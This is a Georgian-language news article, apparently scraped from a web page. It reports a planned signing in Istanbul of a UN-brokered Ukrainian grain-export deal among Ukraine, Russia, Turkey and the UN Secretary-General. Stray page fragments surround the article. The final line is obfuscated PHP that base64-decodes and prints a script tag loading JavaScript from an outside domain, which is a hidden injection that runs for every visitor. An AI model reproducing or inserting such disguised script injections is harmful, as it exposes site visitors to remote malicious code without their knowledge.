celsiusi
ავერსი შნაიდერი
უკრაინა, რუსეთი, თურქეთი და გაერო-ს გენერალური მდივანი, ანტონიო გუტერეში უკრაინიდან მარცვლეულის ექსპორტთან დაკავშირებით შეთანხმებას დღეს თურქეთში მოაწერენ ხელს, - ინფორმაციას Guardian-ი ავრცელებს.
 
გამოცემის ცნობით, თურქეთის პრეზიდენტის, რეჯეფ თაიფ ერდოღანის ოფისმა განაცხადა, რომ გასულ კვირას სტამბოლში გამართული მოლაპარაკებების დროს მიღწეული იქნა ზოგადი შეთანხმება გაერო-ს გეგმაზე და რომ ამ შეთანხმებას მხარეები ოფიციალურად დოლმაბაჰჩეს სასახლის ოფისში პარასკევს მოაწერენ ხელს.
 
როგორც რუსეთი, ასევე უკრაინა ხორბლის გლობალური მიმწოდებლები არიან, მაგრამ მოსკოვის შეჭრამ მისი მეზობელი ქვეყნის ტერიტორიაზე ფასების ზრდა და საერთაშორისო სასურსათო კრიზისი გამოიწვია. კიევიდან ექსპორტი შეჩერებულია, ათობით ხომალდი და დაახლოებით 20 მილიონი ტონა მარცვლეული ოდესის პორტშია ჩარჩენილი.
588
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");